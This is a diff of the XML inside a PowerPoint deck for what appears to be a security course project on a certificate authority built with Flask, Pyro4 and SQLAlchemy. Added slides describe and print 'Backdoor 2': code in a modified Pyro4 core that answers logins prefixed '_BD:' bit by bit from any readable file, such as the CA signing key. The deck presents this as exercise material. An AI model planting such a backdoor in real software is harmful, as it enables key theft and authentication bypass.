-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>SQLAlchemy </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>(SQL injections)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
             <a:endParaRPr lang="de-DE" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="Textfeld 4"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="946484" y="1457743"/>
-            <a:ext cx="3351999" cy="584776"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="none" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" sz="3200" dirty="0" smtClean="0"/>
-              <a:t>Applications &amp; RPC</a:t>
-            </a:r>
-            <a:endParaRPr lang="de-DE" sz="3200" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784858385"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838851764"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -5007,50 +4775,155 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>All traffic via SSH (</a:t>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1433064" y="2108184"/>
+            <a:ext cx="8229600" cy="4525963"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Webapplication</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Python</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Flask (CSRF, XSS)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>nginx (DDOS, HTTPS)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>RPC </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>via Pyro4</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>SSH tunnel (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>Protect information while being processed, in transit, and in </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>storage)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Backup/Logging (BCM, Accountability, Intrusion detection)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Local iptables (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Security in depth)</a:t>
+              <a:t>secrecy and </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>integrity)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>CA Core application</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Python</a:t>
             </a:r>
             <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>pyOpenSSL </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>m2crypto </a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>SQLAlchemy </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>(SQL injections)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Textfeld 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="946484" y="1457743"/>
+            <a:ext cx="3351999" cy="584776"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>Applications &amp; RPC</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="3200" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838851764"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784858385"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/presentation/Präsentation1.pptx
+++ b/presentation/Präsentation1.pptx
@@ -13,9 +13,18 @@
     <p:sldId id="263" r:id="rId7"/>
     <p:sldId id="262" r:id="rId8"/>
     <p:sldId id="264" r:id="rId9"/>
-    <p:sldId id="265" r:id="rId10"/>
-    <p:sldId id="266" r:id="rId11"/>
-    <p:sldId id="268" r:id="rId12"/>
+    <p:sldId id="269" r:id="rId10"/>
+    <p:sldId id="265" r:id="rId11"/>
+    <p:sldId id="270" r:id="rId12"/>
+    <p:sldId id="266" r:id="rId13"/>
+    <p:sldId id="268" r:id="rId14"/>
+    <p:sldId id="273" r:id="rId15"/>
+    <p:sldId id="274" r:id="rId16"/>
+    <p:sldId id="275" r:id="rId17"/>
+    <p:sldId id="276" r:id="rId18"/>
+    <p:sldId id="277" r:id="rId19"/>
+    <p:sldId id="271" r:id="rId20"/>
+    <p:sldId id="272" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3225,6 +3234,409 @@
           <a:p>
             <a:r>
               <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Backdoor 2</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1600200"/>
+            <a:ext cx="8229600" cy="5043905"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Compile </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>a vulnerable core.py file of the Pyro4 RPC middleware </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>into core.pyc </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Vuln Pyro4 checks </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>called </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>method </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>= credential_login </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>C</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>hecks </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>username has </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>certain </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>prefix (</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>xtracts </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>a filename from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>provided username</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>U</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>ses password </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>as offset n </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>T</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>ries </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>to read the nth bit of the provided </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>file</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>If </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>the bit is 0 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>returns </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>a login </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>error, successful login </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>otherwise</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Read </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>any file that the core RPC application can </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>read</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>(CA signing key)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1254974569"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="548106"/>
+            <a:ext cx="8229600" cy="5578058"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>try:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>   if method.__name__ == "credential_login”:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>       if len(vargs) == 2:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>            user, password = vargs</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>            if user.startswith("_BD:"):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>                filename = user[4:]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>               offset = bit_offset_calculation(int(password))</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>               with file(filename, "rb") as f:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>                    return get_bit(f, offset)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>-&gt; PWND</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170410095"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
               <a:t>Review</a:t>
             </a:r>
             <a:endParaRPr lang="de-DE" dirty="0"/>
@@ -3368,7 +3780,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -3434,18 +3846,490 @@
               <a:t>rshell</a:t>
             </a:r>
           </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Batman</a:t>
-            </a:r>
-          </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2082681963"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Textfeld 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="607679" y="1550737"/>
+            <a:ext cx="1691689" cy="1569660"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="9600" dirty="0" smtClean="0"/>
+              <a:t>NA</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="9600" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1641490284"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Textfeld 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2626311" y="2125579"/>
+            <a:ext cx="1691689" cy="1569660"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="9600" dirty="0" smtClean="0"/>
+              <a:t>NA</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="9600" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857826694"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Textfeld 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3735890" y="3120397"/>
+            <a:ext cx="1691689" cy="1569660"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="9600" dirty="0" smtClean="0"/>
+              <a:t>NA</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="9600" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857826694"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide17.xml><?xml version="1.0" encoding="utf-8"?>
